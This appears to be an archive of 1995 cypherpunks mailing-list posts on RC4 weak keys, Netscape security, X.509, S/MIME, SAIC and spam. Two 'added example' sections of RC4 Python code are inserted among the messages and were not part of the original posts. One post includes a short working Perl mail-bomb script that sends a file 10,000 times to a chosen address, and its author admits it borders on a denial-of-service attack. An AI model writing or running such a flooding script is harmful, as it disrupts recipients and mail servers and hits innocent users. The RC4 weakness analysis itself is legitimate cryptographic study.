(prejudices).

Brent






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Roos <AndrewR@beetle.vironix.co.za>
Date: Fri, 29 Sep 95 12:00:13 PDT
To: stewarts <stewarts@ix.netcom.com>
Subject: RE: Cryptanalysis of RC4 - Preliminary Results (Repeat)
Message-ID: <306C426E@beetle.vironix.co.za>
MIME-Version: 1.0
Content-Type: text/plain



Hi Bill

You could check for the full three-byte prefix, which further reduces the   
number of keys you have to discard. Although all keys beginning "00 00"   
are weak in the sense of my original post, they do not appear to be as   
exploitable as the prefixes which generate two-byte probable sequences.

I also recommend generating and discarding some initial sequence bytes,   
since the generation process mixes up the state table further. An extra   
"round" through the state table (i.e. generating 256 bytes) _appears_ to   
confuse things significantly, since by the time you've generated the   
initial state table from the key, Index Y is a function of all bytes of   
the key, so the second time around it's hard to figure out the impact of   
the byte swaps. But I wouldn't trust this without a significant amount of   
analysis: as always in this field, appearances can be dangerously   
deceptive.

Of course, this defense is not possible with protocols like SSL where you   
have to follow the spec - or better still, PCT which conveniently moves   
the MAC to the *end* of the record, exposing the initial stream...

Andrew

 ----------
From:  stewarts[SMTP:stewarts@ix.netcom.com]
Sent:  29 September 1995 10:16
To:  Andrew Roos
Cc:  cypherpunks
Subject:  Re: Cryptanalysis of RC4 - Preliminary Results (Repeat)

It sounds like any application using RC4 with random session keys
should start by testing session keys and rejecting any that
start with 00 00 or 03 FD; it means doing 2**-15 more random key
generations, and reducing the brute-force space by 2**-15,
but it's a pretty small reduction.
________________________________________________________________
Andrew Roos <andrewr@vironix.co.za>

// C++ programmers have class (but not much inheritance)

PGP Fingerprint: F6 D4 04 6E 4E 16 80 59 3A F2 27 94 8B 9F 40 26
Full key at ftp://ftp.vironix.co.za/PGP-keys/AndrewRoos
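
The two defenses discussed in this exchange, as an added example that is not part of either message: rejecting random session keys that begin with the prefixes named in the quoted text (00 00 and 03 FD), and generating and discarding the first 256 keystream bytes before use. The function names and the 16-byte key length are assumptions made for illustration; the cipher is the widely published RC4 algorithm.

```python
import os

# Two-byte key prefixes named in the quoted message ("00 00 or 03 FD").
WEAK_PREFIXES = (bytes([0x00, 0x00]), bytes([0x03, 0xFD]))


def rc4_keystream(key, n, drop=0):
    """Return n RC4 keystream bytes after discarding the first `drop` bytes."""
    if not 1 <= len(key) <= 256:
        raise ValueError("RC4 key must be 1..256 bytes")
    if n < 0 or drop < 0:
        raise ValueError("n and drop must be non-negative")

    # Key schedule: build the 256-entry state table from the key.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]

    # Generation: each output byte also swaps two table entries, so the
    # discarded bytes keep mixing the table before any output is used.
    i = j = 0
    out = bytearray()
    for count in range(drop + n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        if count >= drop:
            out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_crypt(key, data, drop=256):
    """Encrypt or decrypt `data` (same operation), skipping `drop` bytes."""
    stream = rc4_keystream(key, len(data), drop)
    return bytes(a ^ b for a, b in zip(data, stream))


def has_weak_prefix(key):
    """True if the key starts with one of the two-byte prefixes above."""
    return bytes(key[:2]) in WEAK_PREFIXES


def new_session_key(length=16, rand=os.urandom):
    """Draw random keys until one passes the prefix test.

    Returns (key, rejected) where `rejected` counts discarded candidates.
    Two prefixes out of 65536 means about one draw in 2**15 is rejected.
    """
    rejected = 0
    while True:
        key = rand(length)
        if not has_weak_prefix(key):
            return key, rejected
        rejected += 1


if __name__ == "__main__":
    key, rejected = new_session_key()
    message = b"constructed sample plaintext"
    ciphertext = rc4_crypt(key, message)           # drops 256 bytes first
    assert rc4_crypt(key, ciphertext) == message   # both ends must drop 256
    print("rejected candidates:", rejected)
    print("ciphertext:", ciphertext.hex())
```

Both ends have to agree on the number of discarded bytes, which is why the message says this is not available when a fixed protocol spec has to be followed.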




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: karlton <karlton@netscape.com>
Date: Fri, 29 Sep 95 21:07:23 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape hole without .Xauthority (fwd)
In-Reply-To: <Pine.3.89.9509291503.A1295-0100000@jamarillo>
Message-ID: <306CC278.4AF@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


If your X server is not secure, then your pass phrases
are not secure. If your pass phrases are not secure then
private keys are compromised. If your private keys are
compromised ...

She swallowed a fly! Perhaps, she'll die.

PK
--
Philip L. Karlton                       karlton@netscape.com
Principal Curmudgeon                    http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: karlton <karlton@netscape.com>
Date: Fri, 29 Sep 95 21:21:33 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <9508298123.AA812398949@cc2.dttus.com>
Message-ID: <306CC5CC.6A7E@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


I will mail the relevant files to Mr. Diehl.

PK
--
Philip L. Karlton                       karlton@netscape.com
Principal Curmudgeon                    http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 29 Sep 95 21:43:26 PDT
To: cypherpunks@toad.com
Subject: Murdering Electronic junk mailers *should* be legal. Nuking thei
Message-ID: <199509300442.VAA28026@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On 29 Sep 95 at 16:54, Syed Yusuf wrote:


> I just received an electronic junkmail! 
> not only that but it was racist (and/or republican) in content.
 
!!
> Nothing? NOTHING??????
 
> Cypher punks to the rescue? my privacy has been violated anyone got
> any ideas besides just putting each individual into my kill file?

The return address was forged, I emailed the header chain's 
first smtp server admin to see if they can help. 

If I find the guy, he provider will nuke him or they are toast. 
Period!

> --
> Syed Yusuf <yusuf921@uidaho.edu> |   http://www.uidaho.edu/~yusuf921
> Keep me away from Wisdom that does not Cry, Philosophy that does not
> Laugh, and Greatness that does not bow before Children
>                                                  --Kalil Gibran
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 29 Sep 95 13:54:37 PDT
To: cypherpunks@toad.com
Subject: Re: Anon Http web Proxy V2.1
In-Reply-To: <9509281922.AA18715@hplyot.obspm.fr>
Message-ID: <9509292054.AA24798@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


 > I fixed the IOs, it now works a lot faster, play with it on 
 >   http://hplyot.obspm.fr:6661/  (no abuse plz)
 > and get the source package on 
 >   [old now invalid url deleted]

Ok, I updated my tclbin thing to include the unbuffered IO change,
And I've added everything you need to build the shell, as well as the
proxy source itself, in the latest tclbin release :
    ftp://hplyot.obspm.fr/tcl/tclbin-0.5.tgz

I wonder if anyone is interested ?

ps: I received today the rsa/amno shirts I've ordered from Adam, they
*rock*, well designed, very good quality,... a must ! see
http://www.dcs.ex.ac.uk/~aba/uk-shirt.html
{no i don't earn a buck for advertising :-)}

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

terrorist strategic South Africa munitions Nazi jihad Marxist




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Fri, 29 Sep 95 19:12:51 PDT
To: cypherpunks@toad.com
Subject: Re: SAIC bought InterNic, but who is SAIC?  A spook contractor!
Message-ID: <199509300212.WAA29555@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/corporate/history/25.html


    *** About SAIC ***
     
_________________________________________________________________


   
                          "SAIC 25 YEARS OF PROGRESS"
                                       
   Founded by a small group of San Diego scientists in 1969, Science
   Applications International Corporation (SAIC) now ranks as the
   nation's largest employee-owned high-tech company. With annual
   revenues of $1.6 billion, SAIC has almost 4,000 employees in San
   Diego, and about 16,000 employees at more than 250 locations
   worldwide.

   SAIC offers broad expertise in technology development and analysis,
   computer system development and integration, technical support
   services, and computer hardware and software products. SAIC
   scientists and engineers work to solve complex technical problems in
   business areas that include environment, energy, health,
   transportation and space.

   Since the beginning, SAIC has been committed to making significant
   contributions to nationally important programs. Over the past two
   decades, SAIC technical staff have contributed to clean-up efforts at
   Three Mile Island and Prince William Sound, to the success of
   Operation Desert Storm, and to space missions ranging from Voyager to
   the shuttle flights. The company is helping develop new technology to
   clean up hazardous waste at Superfund sites, while other scientists
   are studying global climate and oceanographic changes. In another
   critical area, SAIC is increasing the quality of patient care while
   lowering costs by developing an automated patient record system for
   Department of Defense medical facilities.

   Today, SAIC generates about 90 percent of its business through
   federal government contracts, half of which are in the national
   security area. The company has been transitioning its extensive
   experience in advanced defense systems and software engineering to
   benefit civilian programs. For example, SAIC networking capability
   helps dozens of government agencies share information to fight drug
   smuggling, and integrates technology that has put a pollution-free
   bus on the road.

   Bob Beyster, SAIC's founder and chief executive officer, credits the
   success of the company to its employee ownership.

   "The hallmark of SAIC through the years has been the principle that
   those who contribute to the company should own it, with that
   ownership proportional to their contribution and performance as much
   as possible," Beyster says, "SAIC was designed for professional
   people who want to do superior scientific and technical work, who
   want to have a stake and a voice in the company's development and
   direction, and who expect fair rewards for doing excellent work."
   
_________________________________________________________________

   
   Copyright SAIC Home
_________________________________________________________________

 
    Last updated on 07-05-95

----------


URL: http://www.itps.saic.com/websites.htm


Other SAIC Web Sites:

    
_________________________________________________________________

   
   Foundation for Enterprise Development
   
   SAIC Advanced Technology and Analysis Sector
   
   SAIC Aeronautical Systems Operation
   
   SAIC Applied Physics Operation
   
   SAIC ASDI (SEE Program)
   
   SAIC Asset C3I Group
   
   SAIC Hampton's Information System
   
   SAIC HTTP Server Site
   
   SAIC Idaho Falls ID
   
   SAIC Ideas Group
   
   SAIC Information and Simulation Sciences
   
   SAIC Information Technology Group
   
   SAIC Information Technology Lab
   
   SAIC JSTARS MOT&E Office
   
   SAIC @ Langley Research Center
   
   SAIC Los Altos
   
   SAIC Medical Imaging
   
   SAIC @ New Mexico
   
   SAIC Open Systems Lab
   
   SAIC Security Web Site
   
   SAIC Space Sciences
   
   SAIC Sterling Heights, Michigan
   
   SAIC System Development Operation Center
   
   SAIC Systems Engineering
   
   SAIC Technology Solution Sector
   
   SAIC Telecommunications Information Engineering Organization
   
   SAIC Test and Evaluation Group
   
   SAICnet Gopher
   
     
_________________________________________________________________

   
   SAIC-Hosted/Created Sites:
   
   Smart Site
   
   City of Ridgecrest Homepage






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org  (Dan Bailey)
Date: Fri, 29 Sep 95 19:15:12 PDT
To: cypherpunks@toad.com
Subject: ESM under ULTRIX?
Message-ID: <199509300215.AA06751@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain



I'm having some trouble getting ESM to work under DEC Ultrix.  Has
anyone gotten this to work?  My first problem was that Ultrix doesn't
understand one of the constants passed to an ioctl.  With the help of
a Linux box, I got the value of the constant and plugged it in.  
	Now ESM compiles, says randomizing........, then does a carriage
return and just dies.  Ctrl-C doesn't work, Ctrl-Z doesn't work. 
Further I know that it's dying somewhere before the ioctl.  Anyone
know how to make this work?  For reference,
> uname -a                      
ULTRIX bigwpi.WPI.EDU 4.5 0 RISC
>                               

						Dan

***************************************************************
#define private public						dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
***************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Fri, 29 Sep 95 19:22:04 PDT
To: cypherpunks@toad.com
Subject: Re: SAIC bought InterNic, but who is SAIC?  A spook contractor!
Message-ID: <199509300221.WAA00326@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://opentext.uunet.ca:8080/omw/simplesearch
  
   
   The Open Text Index found 199 pages containing: Science
   Applications International Corporation.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Allen <ChristopherA@consensus.com>
Date: Fri, 29 Sep 95 22:26:13 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: X.509, S/MIME, and evolution of PGP
Message-ID: <v02130505ac9269af6219@[157.22.240.12]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:22 PM 9/27/95, Bill Stewart wrote:
>2) RSA patent - can this be built with RSAREF?  Or RSAREF with permission
>for a couple extra activities?  Or built out of RIPEM or RIPEM-SIG?
>The latter has the benefit of already being exportable.

It certainly can be built from RSAREF, as I use my Apple DigiSign X.509 key
(ultimately created with TIPEM in the Mac system software) with RIPEM/Mac
(which uses RSAREF.)

Some additional info: my company, Consensus Development, has commercial
rights to license developers RSAREF and also has a good relationship with
VeriSign. We are helping them write a variety of tools to make issuing X.509
certs easier.

>5) S/MIME - real S/MIME compliance requires support for RC2 as well as
>publicly available algorithms, though this is really just an X.509 handler.

I've been working on getting RC2/RC4 in object-only exportable size key
form from RSA for RSAREF customers, and Jim Bidzos has agreed in principle.
We have to work out details, however.

>6) It's a lot of work - well, yeah, it is.  And I'm lazy.  Is there enough
>related code in SSLeay to steal to help implement it?

I spoke with Eric yesterday and I think he was working on some ASN.1
related classes for a future version of SSLeay.

------------------------------------------------------------------------
..Christopher Allen                  Consensus Development Corporation..
..<ChristopherA@consensus.com>                 1563 Solano Avenue #355..
..                                             Berkeley, CA 94707-2116..
..<http://www.consensus.com/>             o510/559-1500  f510/559-1505..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John D. Ervin" <jervin@netpath.net>
Date: Fri, 29 Sep 95 20:13:48 PDT
To: cypherpunks@toad.com
Subject: Export/import of chips
Message-ID: <199509300315.XAA01062@server1.netpath.net>
MIME-Version: 1.0
Content-Type: text/plain


I deal with Importers from Taiwan, Hong Kong, Korea, and China on a daily
basis. 

Because the deals I get on components are very good...

They are name brand and meet FCC Standards when assembled as systems, but when 
imported as components they are generally worthless, until assembled

How is import or export of Encryption related components monitored ??

Microprocessors can be imported and exported, as can boards..
As Junk....

Nobody Checks these shipments ??

Now if some of those boards did encryption/decryption, and they were paired
with a processor, They could do some damage..

But when imported and exported as components (ie Electronic Junk) who is to
tell what the end usage is really for ??

This is how a Toyota, Datsun, Subaru, etc are really American built and are
American Cars.....
-------------------------------------------------
jervin@netpath.net


-------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 29 Sep 95 15:40:21 PDT
To: cypherpunks@toad.com
Subject: Call for IT Sec XX
Message-ID: <199509292240.XAA16987@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



From: <http://www.xiwt.org/secpros1.htm>


                      Call for White Papers

     Information Technology Security Policy Setting Process

                          issued by the

                   Cross-Industry Working Team

                  Thursday, September 28, 1995


Introduction

The Cross-Industry Working Team (XIWT) is seeking inputs from U.S.
industry on ways to improve the process by which public policy on
information technology systems security is developed. At the
invitation of the Information Infrastructure Task Force (IITF) of
the U.S. government, XIWT is soliciting ideas broadly from US
industry, in the form of White Papers that address this issue. XIWT
will, later this year, convene a workshop of industry experts to
organize the ideas and suggestions expressed in these White Papers
into a report for use by the IITF, and will prepare a report to be
made available to the public.

XIWT is a multi-industry coalition of organizations committed to
defining the architecture and key technical requirements for a
powerful and sustainable national information infrastructure (NII).
XIWT aims to foster the understanding, development and application
of technologies that cross industry boundaries; facilitate the
conversion of the NII vision into real-world implementations, and
facilitate a dialogue among representatives of stakeholders in the
private and public sector. Additional information about XIWT can be
found on the Internet at: http://www.xiwt.org/homepage.


Information Technology Systems Security

In the developing National Information Infrastructure (NII),
information technology will be deployed in a wide range of contexts
and systems including communications, computing, software systems,
and many different types of applications. The ability of this
technology, and the systems which employ it, to provide the
requisite levels of security and protection, are of concern to
almost everyone.

Issues of central concern include: physical protection of systems
and their contents, potential vulnerabilities at various points
within the networked environments of these systems, and the ability
to provide or even guarantee reliable and/or uninterruptable
service. The infrastructure for such capabilities will need to
include mechanisms for the protection of networks, computers and
other types of equipment as well as systems that employ these
elements, as well as methods for analysis, certification and
validation of technology and systems, and for facilitating the
setting of standards. It is likely that cryptographic capabilities
will need to be available throughout for possible use in protection
and authentication of information. Issues involving the management
of these capabilities will need to be uncovered, discussed and
resolved where possible. At present, the federal government has no
formal process in place, in the Congress or in Executive Branch
agencies, which adequately involves the private sector in the
determination of public policy in this area.

Responsibilities for this broad area within the federal government
are widely diffused and do not necessarily insure that all the
relevant concerns of the private sector are taken into account.
Further, no single process is used by the various parts of the
federal government and a variety of policies, reflected in laws,
regulation and practice, usually result. A methodology is required
by which private sector interests can be adequately expressed and
factored into resulting policies. The purpose of this call for
white papers is to request written inputs from interested and
knowledgable parties on how the formal process to developing
information technology systems security policies may be improved,
and particularly on how private sector inputs can be most
effectively incorporated.

Specifically, industry is requested to identify those areas,
domains, and issues that are especially relevant for consideration,
and to recommend specific suggestions or approaches by which the
policy determination process in these areas may be improved. This
may entail, for example, the establishment of one or more bodies
dedicated to this purpose, within or across domains; the creation
of a broad set of principles for the government or other bodies to
employ; the setting of national goals or other specific
recommendations for federal action.


Submissions

White papers are specifically solicited from U.S. industry; other
individuals who wish to contribute are welcome to do so.
Submissions may be made on paper or electronically by sending
electronic mail, document files, or via a form located on the XIWT
World Wide Web server (addresses below). Submissions made on behalf
of companies will be taken to represent the views of the firm;
these will be verified if it is not made clear in the submission
that the document represents a company position. Individual
submissions will not be verified if they do not claim to represent
company positions.

Submissions should be: 1) responsive to the primary goal of this
call, (focused specifically on process improvement and not the
presentation of view on policy deficiencies or on desired
policies); 2) clear in terms of specific topics, areas or domains
of policy; 3) reasonably direct, brief and timely.

Any format may be used for the white paper, and it may be of any
length. However, submissions must include the following
information, on envelopes or headers to email and web messages, and
on the submission document, whatever its form:

1.   The name of individual making the submission;

2.   The name of firm on whose behalf the submission is made;

3.   The return address by which submission may be verified, if
     necessary.

XIWT will convene a one or two day invitational workshop in the
Washington DC area in December, 1995, to review submissions and
organize the preparation of findings. Papers received by November
15, 1995, will be used in the workshop.  The report of this effort
is intended to be made available in February, 1996.

Submissions must be made to one of the following addresses:

Conventional Mail:

     Security Policy Process
     XIWT
     1895 Preston White Drive
     Suite 100
     Reston VA 22091-0913

Electronic Mail:

     secpros@cnri.reston.va.us

Please place: "Security Policy Process" in the "Subject:" field.
Please use ASCII text in any attachments.

World Wide Web: suggestions may be contributed via the internet
at: http://www.xiwt.org/response


The content of submissions will be used by XIWT only for the
purposes described in this call. No specific attribution to
individual companies or individuals will be made in the findings or
report. We look forward to your help in this important national
effort.

For additional information, please contact Charles Brownstein or
Pam Memmott
Tel:  (703) 620-8990
Internet: cbrownst@cnri.reston.va.us
Internet: pmemmott@cnri.reston.va.us


9/22/95; PJM







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 29 Sep 95 23:58:27 PDT
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <199509300658.XAA03050@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


In addition to being totally off topic and spamming lots of lists, 
Terra Libra is selling Ponzi schemes and pyramid schemes.

This is just "make money fast" elaborately dressed in libertarian
rhetoric.


At 07:11 AM 9/28/95 +0100, Anonymous wrote:
>   This is the best description of debt currency I've seen. Debt currency
>is today's most effective form of slavery. It is today's American slavery.
>
>                The text is from the book:
>
>               THE ECONOMIC RAPE OF AMERICA
>                 WHAT YOU CAN DO ABOUT IT
>
>by Frederick Mann of Terra Libra
>
>The book costs $19.95 plus $2 postage and handling.
>It can be ordered from:
>
>Terra Libra
>2430 E. Roosevelt #998
>Phoenix, Az 85008
>
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 29 Sep 95 21:40:21 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Hack Microsoft
In-Reply-To: <199509291635.JAA06820@infinity.c2.org>
Message-ID: <199509300443.AAA28911@homeport.org>
MIME-Version: 1.0
Content-Type: text


Perry writes:

> Thats almost an invitation to hack Microsoft's web products, isn't it?
> 
> (Anyone from Netscape care to join in the fun?)
> 
> Perry

	While this might be read as a sarcastic comment, I'll
suggest that it really is excellent advice from Perry.  Like
cryptosystem design, secure software is best written by those with
experience breaking other people's systems.

	Encouraging Netscape programmers to hack at SST will result in
embarrassing disclosures for Microsoft, and better code for Netscape.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 30 Sep 95 01:28:33 PDT
To: Christopher Allen <ChristopherA@consensus.com>
Subject: Re: X.509, S/MIME, and evolution of PGP
Message-ID: <199509300828.BAA00347@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:29 PM 9/29/95 -0700, Christopher Allen <ChristopherA@consensus.com> wrote:
>At 3:22 PM 9/27/95, Bill Stewart wrote:
>>5) S/MIME - real S/MIME compliance requires support for RC2 as well as
>>publicly available algorithms, though this is really just an X.509 handler.
>I've been working on getting RC2/RC4 in object-only exportable size key
>form from RSA for RSAREF customers, and Jim Bidzos has agreed in principle.
>We have to work out details, however.

Sounds good, but having publicly implementable standards would be nicer;
licensable patented code is enough of a hassle, without having standards
that have *trade secrets* built into them.  RC2 as an option is fine;
RC2 as a mandatory part of a conforming implementation is pretty tacky.

>>6) It's a lot of work - well, yeah, it is.  And I'm lazy.  Is there enough
>>related code in SSLeay to steal to help implement it?

Actually, it turns out that the latest RIPEM has certificate chains, Web of
Trust, and really just about everything I want, except perhaps user-friendly GUIs,
which could be added easily enough.  I haven't yet sorted out which
parts are in the export-approved RIPEM-SIG and which parts are only in RIPEM2.1,
but it's a pretty straightforward job.  (Now to go scrounge some disk space!)
The RIPEM code is all public-domain, and uses RSAREF for its crypto,
so exporting the non-RSAREF parts is copyright/patent clean, and maybe
it can be possible to put together a CJ-able version of the new stuff
so it can gain legitimacy after having been exported for months :-)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ford Prefect <remailer@bi-node.zerberus.de>
Date: Fri, 29 Sep 95 18:34:21 PDT
To: cypherpunks@toad.com
Subject: Re: Electronic junk mail (one solution)
Message-ID: <m0syqoP-0002ThC@bi-node.zerberus.de>
MIME-Version: 1.0
Content-Type: text/plain


OK...I know this borders on a "denial of service" attack since it may 
affect innocent users. How would you like to be the one to explain to  
your System Administrator that the Megabytes of returned Spam on the 
disk are yours? 
I realize that some people's implementations of Sendmail will tell who
you are regardless, so you might have to modify the "system" line for
your own tastes. Also you might *not* want to be anon. Please feel
free to modify to your own tastes. The delay loop is to space out 
the load. I also tried it with premail instead of Sendmail and it
went thru the remailers just fine. It should be capable of running 
in the background. Only took 5 minutes to write and a couple of 
remailers to test.
============================================================
#!/usr/bin/perl
print "Who does this go to?: ";
chop($name = <STDIN>);
print "What is the filename to send?: ";
chop($filename = <STDIN>);
for ($a=0;$a<100;$a++) {
for ($b=0;$b<100;$b++) {
system ("/usr/lib/sendmail -f nobody $name < $filename");
for ($x=0;$x<600000;$x++){};
}
}
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@dg.thepoint.net>
Date: Sat, 30 Sep 95 02:32:26 PDT
To: David Taffs <dat@ebt.com>
Subject: Re: [revcoal@pcnet.com: Re: The owls are not what they seem]
In-Reply-To: <9509151740.AA06675@veronica.EBT.COM>
Message-ID: <Pine.D-G.3.91.950930053733.23110K-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Sep 1995, David Taffs wrote:

> 
> fyi...
> 
> Date: Fri, 15 Sep 1995 00:02:33 -0400 (EDT)
> From: "Donna J. Logan" <revcoal@pcnet.com>
> ... 
> BTW, I'm being cagey in actually mentioning your service provider's name/
> initials, as we found that was one of the "keywords" in the filter program
> used by them and a certain national police agency (whose initials also
> trigger the filter program) to flag posts which they thought may be 
> "interesting", resulting in delays of up to days in posting.  Same thing
> happened in live chat in PRIVATE chat rooms, we were able to bring the
> system to a complete halt by just typing the initials of Frederico's
> Bumbling Idiots....                                      ^^^^^^^^^^^
  ^^^^^^^^^^^^^^^
It may amuse you to know that some other federal law enforcement agencies 
refer to Fred's bunch as "Famous But Incompetent."

But then their TV show got canceled ....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 30 Sep 95 03:42:15 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Cryptanalysis of RC4 - Preliminary Results (Repeat)
In-Reply-To: <199509291716.KAA06460@ix8.ix.netcom.com>
Message-ID: <9509301040.AA02608@all.net>
MIME-Version: 1.0
Content-Type: text


...
> >The attack is based on two particularly interesting three-byte key
> >prefixes which have a high probability of producing PRNG sequences
> >which start with a known two-byte sequence. The prefixes are:
> >1.  Keys starting with "00 00 FD" which have a 14% probability of
> >    generating sequences which start "00 00".
> >2.  Keys starting with "03 FD FC" which have a 5% probability of
> >    generating sequences which start "FF 03".
> [much interesting work deleted]
> 
> It sounds like any application using RC4 with random session keys
> should start by testing session keys and rejecting any that
> start with 00 00 or 03 FD; it means doing 2**-15 more random key
> generations, and reducing the brute-force space by 2**-15,
> but it's a pretty small reduction.

The problem is that if these keys are weak, there may be many others
that are also weak.  In fact, by the time we explore all of the
weaknesses, we may find the system is no longer very strong at all. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
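
Added example (not part of the original messages): the two quoted prefixes can be checked empirically by padding each with random key bytes and counting how often the keystream starts as stated. It goes one step beyond the thread by also measuring a key with K[0]+K[1] = 0 (mod 256) that passes the proposed prefix screen; the 16-byte key length, trial count, function names and sample keys are assumptions of this example.

```python
import random
import secrets


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4: key schedule (KSA), then n bytes of generator output (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


# Key prefix -> keystream start, as quoted in the thread.
QUOTED_CASES = {
    bytes.fromhex("0000fd"): bytes.fromhex("0000"),  # quoted as 14%
    bytes.fromhex("03fdfc"): bytes.fromhex("ff03"),  # quoted as 5%
}

# Prefixes the reply proposes to reject when generating session keys.
SCREENED_PREFIXES = (bytes.fromhex("0000"), bytes.fromhex("03fd"))


def hit_rate(prefix, expected, key_len=16, trials=4000, seed=1995):
    """Fraction of keys starting with `prefix` whose keystream starts with `expected`.

    The remaining key bytes come from a seeded PRNG so the measurement is
    repeatable; that PRNG is for the experiment only, never for real keys.
    """
    rng = random.Random(seed)
    pad = key_len - len(prefix)
    hits = 0
    for _ in range(trials):
        key = prefix + bytes(rng.randrange(256) for _ in range(pad))
        if rc4_keystream(key, len(expected)) == expected:
            hits += 1
    return hits / trials


def is_screened_out(key: bytes) -> bool:
    """True if the key starts with one of the prefixes proposed for rejection."""
    return key.startswith(SCREENED_PREFIXES)


def new_session_key(key_len: int = 16) -> bytes:
    """Draw random session keys until one passes the prefix screen."""
    while True:
        key = secrets.token_bytes(key_len)
        if not is_screened_out(key):
            return key


def unscreened_class_rate(k0=0x10, k2=0x20, **kw):
    """Beyond the thread: a constructed key prefix with K[0]+K[1] = 0 (mod 256).

    It passes the prefix screen; this measures how often the first output
    byte equals K[2]+3 (mod 256).
    """
    prefix = bytes([k0, (-k0) & 0xFF, k2])
    return hit_rate(prefix, bytes([(k2 + 3) & 0xFF]), **kw)


if __name__ == "__main__":
    for prefix, start in QUOTED_CASES.items():
        print(prefix.hex(), "->", start.hex(), f"{hit_rate(prefix, start):.3f}")
    print("random keys -> 0000", f"{hit_rate(b'', bytes(2)):.5f}")
    print("10 f0 20 -> first byte 23", f"{unscreened_class_rate():.3f}")
```

The last function shows why a fixed prefix blacklist is a weak mitigation: the sample key passes the screen, yet its first output byte is predictable far more often than the 1/256 expected of a uniform generator.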



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Cancelmoose[tm]" <moose@cm.org>
Date: Fri, 29 Sep 95 23:41:46 PDT
To: wilcoxb@nagina.cs.colorado.edu (Bryce Wilcox)
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
In-Reply-To: <199509162353.RAA06965@nagina.cs.colorado.edu>
Message-ID: <19950930064113.AXK11529@cm.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Several people are working on improvements to netnews which allow more active
> filtering.  The most promising techniques that I have heard about involve a
> lot of "ratings" being generated by readers and then taken into account by
> other readers when filtering/sorting the articles.
>
> I don't know if the technology is there yet, or if it is accessible to most
> of our readers.  One person who is working on such a scheme is "(cm)", or 
